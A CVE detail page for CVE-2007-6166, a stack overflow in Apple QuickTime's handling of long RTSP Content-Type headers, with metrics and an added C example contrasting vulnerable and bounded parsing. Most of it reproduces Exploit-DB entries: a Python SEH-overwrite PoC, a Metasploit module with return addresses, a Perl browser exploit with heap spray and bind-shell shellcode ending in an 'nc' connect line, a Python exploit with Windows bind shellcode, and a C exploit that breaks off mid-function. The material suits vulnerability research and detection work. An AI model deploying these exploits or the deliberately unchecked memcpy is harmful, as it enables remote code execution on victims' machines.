CVE-2007-6166 : Detail


Overflow
96.4%V3
Network
Published: 2007-11-29 00h00 +00:00
Last modified: 2017-09-28 10h57 +00:00

CVE Description

Stack-based buffer overflow in Apple QuickTime before 7.3.1, as used in QuickTime Player on Windows XP and Safari on Mac OS X, allows remote Real Time Streaming Protocol (RTSP) servers to execute arbitrary code via an RTSP response with a long Content-Type header.

CVE Information

Related Weaknesses

CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
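The description and the CWE-119 entry say what class of bug this is but not what the code pattern looks like. The C program below is an added example, not code from this page, from Apple, or from any of the exploit authors listed further down. It models an RTSP client that copies the server-supplied Content-Type value into a fixed stack buffer (the vulnerable pattern), next to a bounded parser that refuses an oversized value instead of truncating it, and it builds a response with the same 995 + 4096 byte Content-Type layout the PoCs below use, so the bounded parser can be checked against exactly that input. The 256-byte limit, the function names and the sample responses are assumptions for illustration; QuickTime's real internal buffer layout is not described anywhere on the page.

```c
/* Added example (not from this page or from any exploit author on it).
 * CVE-2007-6166 in miniature: an RTSP client copies the server-chosen
 * Content-Type value into a fixed stack buffer without checking its length
 * (CWE-119), shown beside a bounded parser that rejects oversized values.
 * The 256-byte limit and every name here are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>                 /* strncasecmp (POSIX) */

#define CONTENT_TYPE_MAX 256         /* assumed sane bound for a MIME type */
enum rtsp_ct_status { RTSP_CT_OK = 0, RTSP_CT_MISSING = 1, RTSP_CT_TOO_LONG = 2 };

const char BENIGN_RESPONSE[] =       /* constructed sample, normal MIME type */
    "RTSP/1.0 200 OK\r\n"
    "CSeq: 1\r\n"
    "Content-Type: application/sdp\r\n"
    "Content-Length: 0\r\n"
    "\r\n";

/* Return the length of the Content-Type value and point *val at it, or -1
 * if absent.  Only the header block (up to the empty line) is searched. */
long find_content_type(const char *resp, const char **val)
{
    const char *p = strstr(resp, "\r\n");            /* skip status line */
    if (!p) return -1;
    for (p += 2; *p && strncmp(p, "\r\n", 2) != 0; ) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len > 13 && strncasecmp(p, "Content-Type:", 13) == 0) {
            const char *v = p + 13;
            while (v < p + len && *v == ' ') v++;
            *val = v;
            return (long)(p + len - v);
        }
        if (!eol) break;
        p = eol + 2;
    }
    return -1;
}

/* Vulnerable pattern: the copy length comes from the peer.  With the 5091-byte
 * value the PoCs send, the copy overruns 'mime' into the saved frame and SEH chain. */
int vulnerable_set_content_type(const char *resp)
{
    char mime[CONTENT_TYPE_MAX];
    const char *v;
    long n = find_content_type(resp, &v);
    if (n < 0) return RTSP_CT_MISSING;
    memcpy(mime, v, (size_t)n); mime[n] = '\0';      /* no bound check */
    return RTSP_CT_OK;
}

/* Hardened form: check against the destination size before writing, and
 * treat an oversized value as an error rather than truncating it. */
int safe_set_content_type(const char *resp, char *mime, size_t mime_sz)
{
    const char *v;
    long n = find_content_type(resp, &v);
    if (n < 0) return RTSP_CT_MISSING;
    if ((size_t)n >= mime_sz) return RTSP_CT_TOO_LONG;
    memcpy(mime, v, (size_t)n); mime[n] = '\0';
    return RTSP_CT_OK;
}

/* Build a response shaped like the h07 PoC: a_count 'A's then b_count 'B's in
 * Content-Type (995 + 4096 gives the 0x41414141 / 0x42424242 SEH overwrite). */
char *build_poc_response(size_t a_count, size_t b_count)
{
    const char *head = "RTSP/1.0 200 OK\r\nCSeq: 1\r\nContent-Type: ";
    const char *tail = "\r\nContent-Length: 0\r\n\r\n";
    char *out = malloc(strlen(head) + a_count + b_count + strlen(tail) + 1), *p = out;
    if (!out) return NULL;
    memcpy(p, head, strlen(head)); p += strlen(head);
    memset(p, 'A', a_count);       p += a_count;
    memset(p, 'B', b_count);       p += b_count;
    strcpy(p, tail);                                 /* caller frees out */
    return out;
}

/* Status the hardened parser gives a PoC-shaped response. */
int classify_poc(size_t a_count, size_t b_count)
{
    char mime[CONTENT_TYPE_MAX];
    char *poc = build_poc_response(a_count, b_count);
    if (!poc) return -1;
    int st = safe_set_content_type(poc, mime, sizeof mime);
    free(poc);
    return st;
}

int main(void)
{
    char mime[CONTENT_TYPE_MAX] = "";
    int st = safe_set_content_type(BENIGN_RESPONSE, mime, sizeof mime);
    printf("benign: status %d, mime \"%s\"\n", st, mime);
    printf("PoC layout 995+4096: status %d (2 = rejected)\n", classify_poc(995, 4096));
    return 0;
}
```

Build and run with `cc -o rtsp_ct rtsp_ct.c && ./rtsp_ct`. The same length check, applied to captured RTSP responses on port 554, is also the simplest detection signal for this bug: a legitimate MIME type is a few dozen bytes, and every PoC on this page sends several kilobytes in that one header.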

Metrics

CVSS v2 base score 9.3 (High), vector AV:N/AC:M/Au:N/C:C/I:C/A:C, source: NVD

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs, so the percentile is what you use to compare one CVE's EPSS score with the rest.

Exploit information

Exploit Database EDB-ID : 4648

Publication date : 2007-11-22 23h00 +00:00
Author : h07
EDB Verified : Yes

#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <[email protected]>
# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish
# Details:..
#
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
#
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [42424242])
# ----------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00
# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# --> N/A
# ----------------------------------------------------------------
##

from socket import *

header = (
    'RTSP/1.0 200 OK\r\n'
    'CSeq: 1\r\n'
    'Date: 0x00 :P\r\n'
    'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
    'Content-Type: %s\r\n'  # <-- overflow
    'Content-Length: %d\r\n'
    '\r\n')

body = (
    'v=0\r\n'
    'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
    's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
    'i=1.mp3\r\n'
    't=0 0\r\n'
    'a=tool:ciamciaramcia\r\n'
    'a=type:broadcast\r\n'
    'a=control:*\r\n'
    'a=range:npt=0-213.077\r\n'
    'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
    'a=x-qt-text-inf:1.mp3\r\n'
    'm=audio 0 RTP/AVP 14\r\n'
    'c=IN IP4 0.0.0.0\r\n'
    'a=control:track1\r\n'
)

# 995 bytes of filler reach the SEH record; the B's land on nSEH and the handler
tmp = "A" * 995
tmp += "B" * 4096

header %= (tmp, len(body))
evil = header + body

# Act as the RTSP server: the vulnerable client connects to us on 554
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()

# EoF

# milw0rm.com [2007-11-23]
Exploit Database EDB-ID : 16873

Publication date : 2010-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: quicktime_rtsp_content_type.rb 10617 2010-10-09 06:55:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MacOS X QuickTime RTSP Content-Type Overflow',
      # Description?
      # Author?
      'Version'        => '$Revision: 10617 $',
      'Platform'       => 'osx',
      'References'     =>
        [
          [ 'CVE', '2007-6166' ],
          [ 'OSVDB', '40876'],
          [ 'BID', '26549' ],
        ],
      'Payload'        =>
        {
          'Space'    => 3841,
          'BadChars' => "\x00\x0a\x0d",
          'MaxNops'  => 0,
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
            {
              'Arch'          => ARCH_PPC,
              'Ret'           => 0x8fe3f88c,
              'RetOffset'     => 551,
              'PayloadOffset' => 879
            }
          ],
          [ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
            {
              'Arch'          => ARCH_PPC,
              'Ret'           => 0x8fe042e0,
              'RetOffset'     => 615,
              'PayloadOffset' => 3351
            }
          ],
          [ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
            {
              'Arch'      => ARCH_X86,
              'Offset'    => 307,
              'Writable'  => 0xa0bd0f10, # libSystem __IMPORT
              # The rest of these are all in libSystem __TEXT
              'ret'       => 0x9015d336,
              'poppopret' => 0x9015d334,
              'setjmp'    => 0x900bc438,
              'strdup'    => 0x90012f40,
              'jmp_eax'   => 0x9014a77f
            }
          ],
          [ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
            {
              'Arch'      => ARCH_X86,
              'Offset'    => 307,
              'Writable'  => 0x8fe66448, # dyld __IMPORT
              # The rest of these addresses are in dyld __TEXT
              'ret'       => 0x8fe1ceee,
              'poppopret' => 0x8fe220d7,
              'setjmp'    => 0x8fe1ceb0,
              'strdup'    => 0x8fe1cd77,
              'jmp_eax'   => 0x8fe01041
            }
          ],
        ],
      'DefaultTarget'  => 2,
      'DisclosureDate' => 'Nov 23 2007'))
  end

  ######
  # XXX: This does not work on Tiger apparently
  def make_exec_payload_from_heap_stub()
    frag0 =
      "\x90" +             # nop
      "\x58" +             # pop eax
      "\x61" +             # popa
      "\xc3"               # ret
    frag1 =
      "\x90" +             # nop
      "\x58" +             # pop eax
      "\x89\xe0" +         # mov eax, esp
      "\x83\xc0\x0c" +     # add eax, byte +0xc
      "\x89\x44\x24\x08" + # mov [esp+0x8], eax
      "\xc3"               # ret

    setjmp   = target['setjmp']
    writable = target['Writable']
    strdup   = target['strdup']
    jmp_eax  = target['jmp_eax']

    exec_payload_from_heap_stub =
      frag0 +
      [setjmp].pack('V') +
      [writable + 32, writable].pack("V2") +
      frag1 +
      "X" * 20 +
      [setjmp].pack('V') +
      [writable + 24, writable, strdup, jmp_eax].pack("V4") +
      "X" * 4
  end

  def on_client_connect(client)
    print_status("Got client connection...")

    if (target['Arch'] == ARCH_PPC)
      ret_offset     = target['RetOffset']
      payload_offset = target['PayloadOffset']

      # Create pattern sized up to payload, since it always follows
      # the return address.
      boom = Rex::Text.pattern_create(payload_offset)
      boom[ret_offset, 4] = [target['Ret']].pack('N')
      boom[payload_offset, payload.encoded.length] = payload.encoded
    else
      boom = Rex::Text.pattern_create(327)
      boom[307, 4] = [target['ret']].pack('V')
      boom[311, 4] = [target['ret']].pack('V')
      boom[315, 4] = [target['poppopret']].pack('V')
      boom[319, 4] = [target['Writable']].pack('V')
      boom[323, 4] = [target['Writable']].pack('V')

      #
      # Create exec-payload-from-heap-stub, but split it in two.
      # The first word must be placed as the overwritten saved ebp
      # in the attack string. The rest is placed after the
      # Writable memory addresses.
      #
      magic = make_exec_payload_from_heap_stub()
      boom[303, 4] = magic[0, 4]
      boom += magic[4..-1]

      #
      # Place the payload immediately after the stub as it expects
      #
      boom += payload.encoded
    end

    body = " "
    header =
      "RTSP/1.0 200 OK\r\n" +
      "CSeq: 1\r\n" +
      "Content-Type: #{boom}\r\n" +
      "Content-Length: #{body.length}\r\n\r\n"

    print_status("Sending RTSP response...")
    client.put(header + body)

    print_status("Sleeping...")
    select(nil, nil, nil, 1)

    print_status("Starting handler...")
    handler(client)

    print_status("Closing client...")
    service.close_client(client)
  end

end
Exploit Database EDB-ID : 6013

Publication date : 2008-07-05 22h00 +00:00
Author : krafty
EDB Verified : Yes

#!/usr/bin/perl
#
# quickbite.pl
#
# Safari + Quicktime <= 7.3 RTSP Content-Type overflow exploit
# for Mac OS X (Intel)
#
# Tested with OS X 10.4.
# On victim, browse to http://server:8080/
# Binds shell on port 4444.
#
# by krafty
#
# greets to sk, halvar, grugq, and all the ethnical hackers
# extra thanks to ddz for osx hackery
# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc
# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
# milw0rm and packetstorm rule
# Bring back the days of technotronic and r00tshell! Freedom.
#
# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:
# "What's worse than biting into an apple and finding a worm?"
# "Finding half a worm".

use Socket;
use IO::Handle;
use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";

$buf = chr(0x11) x 6000;

# don't touch anything below this line

# Page served over HTTP: heap spray, then an EMBED pointing back at this host over rtsp://
$html = <<ENDHTML;
<script>
var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
var shellcode = unescape("$shellcode");
shellcode = prefix + shellcode;
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do { spray += spray; } while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++) memory[i] = spray + shellcode;
var url = "rtsp://" + location.host + "/x.mp3";
document.write("<EMBED SRC='" + url + "' TYPE='video/quicktime' AUTOPLAY='true' />");
</script>
ENDHTML

$rtsp_body = "v=0\r\n" .
    "o=- 16689332712 1 IN IP4 0.0.0.0\r\n" .
    "s=MPEG-1 or 2 Audio\r\n" .
    "i=1.mp3\r\n" .
    "t=0 0\r\n" .
    "a=tool:hello\r\n" .
    "a=type:broadcast\r\n" .
    "a=control:*\r\n" .
    "a=range:npt=0-213.077\r\n" .
    "a=x-qt-text-nam:MPEG-1 or 2 Audio\r\n" .
    "a=x-qt-text-inf:1.mp3\r\n" .
    "m=audio 0 RTP/AVP 14\r\n" .
    "c=IN IP4 0.0.0.0\r\n" .
    "a=control:track1\r\n";

$content_length = length($rtsp_body);

$rtsp_header = "RTSP/1.0 200 OK\r\n" .
    "CSeq: 1\r\n" .
    "Date: 0x00 :P\r\n" .
    "Content-Base: rtsp://0.0.0.0/x.mp3/\r\n" .
    "Content-Type: $buf\r\n" .
    "Content-Length: $content_length\r\n\r\n";

$rtsp = $rtsp_header . $rtsp_body;

$http_header = "HTTP/1.1 200 OK\nContent-type: text/html\n\n";

$| = 1;
my $port = MY_HTTP_PORT;
my $protocol = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";
setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1) or die "Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in($port, INADDR_ANY);
bind(SOCK, $my_addr) or die "bind() failed: $!";
listen(SOCK, SOMAXCONN) or die "listen() failed: $!";
warn "waiting for incoming connections on port $port...\n";

# One listener serves both roles: the first request is the HTTP GET for the
# page, the next one is the RTSP DESCRIBE from the plugin, which gets the overflow.
$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
    next unless my $remote_addr = accept(SESSION, SOCK);
    my ($port, $hisaddr) = sockaddr_in($remote_addr);
    warn "Connection from [", inet_ntoa($hisaddr), ",$port]\n";
    $victim = $hisaddr;
    SESSION->autoflush(1);
    $request = "";
    while(<SESSION>) {
        $request_line = $_;
        $request .= $request_line;
        chomp($request_line);
        if($request_line =~ /DESCRIBE rtsp/) {
            $repeat = 0;
        }
        $x = length($request_line);
        if($x <= 1) {
            last;
        }
    }
    print STDERR $request;
    if($repeat) {
        print SESSION $http_header . $html;
    } else {
        print SESSION $rtsp;
    }
    warn "Connection from [", inet_ntoa($hisaddr), ",$port] finished\n";
    close SESSION;
}
print "Connect to " . inet_ntoa($victim) . ":4444 after 5 seconds\n";
print "nc -nvv " . inet_ntoa($victim) . " 4444\nEnjoy!\n";

# milw0rm.com [2008-07-06]
Exploit Database EDB-ID : 4657

Publication date : 2007-11-25 23h00 +00:00
Author : muts
EDB Verified : Yes

#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <[email protected]>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,
# the attack appears to be prevented because standard buffer overflow
# prevention processes act before any damage can be done, Florio wrote.
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,
# the exploit works against Firefox if QuickTime is the default multimedia player,
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################

from socket import *

header = (
    'RTSP/1.0 200 OK\r\n'
    'CSeq: 1\r\n'
    'Date: 0x00 :P\r\n'
    'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
    'Content-Type: %s\r\n'  # <-- overflow
    'Content-Length: %d\r\n'
    '\r\n')

body = (
    'v=0\r\n'
    'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
    's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
    'i=1.mp3\r\n'
    't=0 0\r\n'
    'a=tool:ciamciaramcia\r\n'
    'a=type:broadcast\r\n'
    'a=control:*\r\n'
    'a=range:npt=0-213.077\r\n'
    'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
    'a=x-qt-text-inf:1.mp3\r\n'
    'm=audio 0 RTP/AVP 14\r\n'
    'c=IN IP4 0.0.0.0\r\n'
    'a=control:track1\r\n'
)

# ExitProcess shellcode will kill browser, but keep the shell open
shellcode = (  # win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
    "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
    "\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
    "\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
    "\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
    "\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
    "\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
    "\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
    "\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
    "\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
    "\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
    "\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
    "\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
    "\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
    "\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
    "\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
    "\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
    "\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
    "\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
    "\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
    "\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
    "\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
    "\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
    "\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
    "\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
    "\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
    "\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
    "\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
    "\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
    "\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
    "\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
    "\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
    "\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
    "\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
    "\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
    "\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
    "\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
    "\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
    "\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
    "\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
    "\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
    "\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
    "\x4f\x48\x56\x69\x6f\x6a\x70\x42")

tmp = "A" * 987
tmp += "\xeb\x20\x90\x90"  # short jump for 7.2
tmp += "\xeb\x20\x9c\x66"  # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp += "\x4e\x28\x86\x66"  # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000 - len(shellcode))  # play with this buffer if you still get exceptions.

header %= (tmp, len(body))
evil = header + body

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()

# milw0rm.com [2007-11-26]
Exploit Database EDB-ID : 4651

Publication date : 2007-11-23 23h00 +00:00
Author : InTeL
EDB Verified : Yes

/*
=============================================================
Apple Quicktime (Vista/XP RTSP Response) Remote Code Exec
=============================================================
Discovered by: h07
Author: InTeL

*Tested on:
- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec
- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec
- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec
- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec

Notes:
[*] On Vista the QuickTimePlayer and the .gtx modules dont have ASLR enabled, NO RANDOMIZATION :)
[*] All the 7.3 and 7.2 DLL modules are SafeSEH enabled, except for the .gtx modules,
    that is how u bypass the SEH Restrictions in XP and in Vista!! so we use Addys from there.
[*] There are ALOT of filtered characters so choose your shellcode wisely or you will run into
    Access Violations. Since I didnt feel like wasting my time going through all the filtered
    Characters, go through it yourself. - Here are some \x4b, \x59, \x79
[*] I did hit my shellcode but b/c i havent gone through all the filtered characters i got an
    Access Violation in the shellcode
[*] Can be easily modified to keep accepting clients with a lil modding, do it yourself u noobs
[***] Here is an example of how to embed a streaming the quicktime redirection to the RTSP exploit.
      http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html
      cough use w/ an iframe cough

Shoutz: UIA, u kno who u ppl are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"wsock32.lib")

int info();

#define port 554

char header_part1[] =
    "RTSP/1.0 200 OK\r\n"
    "CSeq: 1\r\n"
    "Date: 0x00 :P\r\n"
    "Content-Base: rtsp://0.0.0.0/1.mp3/\r\n"
    "Content-Type: ";

char header_part2[] = "Content-Length: ";

char body[] =
    "v=0\r\n"
    "o=- 16689332712 1 IN IP4 0.0.0.0\r\n"
    "s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\r\n"
    "i=1.mp3\r\n"
    "t=0 0\r\n"
    "a=tool:ciamciaramcia\r\n"
    "a=type:broadcast\r\n"
    "a=control:*\r\n"
    "a=range:npt=0-213.077\r\n"
    "a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \r\n"
    "a=x-qt-text-inf:1.mp3\r\n"
    "m=audio 0 RTP/AVP 14\r\n"
    "c=IN IP4 0.0.0.0\r\n"
    "a=control:track1\r\n";

//Place Your Shellcode here but keep the name
char scode[] =
    "\xfc\xbb\x9a\x15\x38\x92\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
    "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x66\xfd\x7c\x92\x96\xfe\xf7"
    "\xd7\xaa\x75\x7b\xdd\xaa\x88\x6b\x56\x05\x93\xf8\x36\xb9\xa2\x15"
    "\x81\x32\x90\x62\x13\xaa\xe8\xb4\x8d\x9e\x8f\xf5\xda\xd9\x4e\x3f"
    "\x2f\xe4\x92\x2b\xc4\xdd\x46\x88\x21\x54\x82\x5b\x76\xb2\x4d\xb7"
    "\xef\x31\x41\x0c\x7b\x1a\x46\x93\x90\x2f\x6a\x18\x67\xc4\x1a\x42"
    "\x4c\x1e\xde\x4a\x4c\x7a\x6b\xec\x7c\x07\xab\x95\x70\x8c\x6c\x6a"
    "\x02\xe2\x70\xdf\x9f\x6a\x81\xf4\xa9\xe1\x11\xba\xaa\xf5\x11\x30"
    "\xc2\xc9\x4e\x77\xe5\x51\x27\xfe\xf1\x12\x07\x7b\x52\x7c\x78\xf6"
    "\x56\x23\x10\x9f\xa9\x51\xee\xc8\xaa\x82\x9d\x93\x33\x29\x06\x35"
    "\xc8\x9f\xa3\xbd\x55\xdf\x2b\x3e\x96\xdf\x2b\x3e\x96";

int main(int argc, char *argv[])
{
    char evilbuf[5200], recvbuf[512];
    char *strptr = NULL;
    char contentlength[] = "327";
    int i, pos;
    struct sockaddr_in saddr;
    WSADATA wsaData;
    SOCKET sock, vicsock;

    info();

    if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
        printf("Unable to initialize Winsock \n");
        exit(1);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("Socket Error \n");
        WSACleanup();
        exit(1);
    }

    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
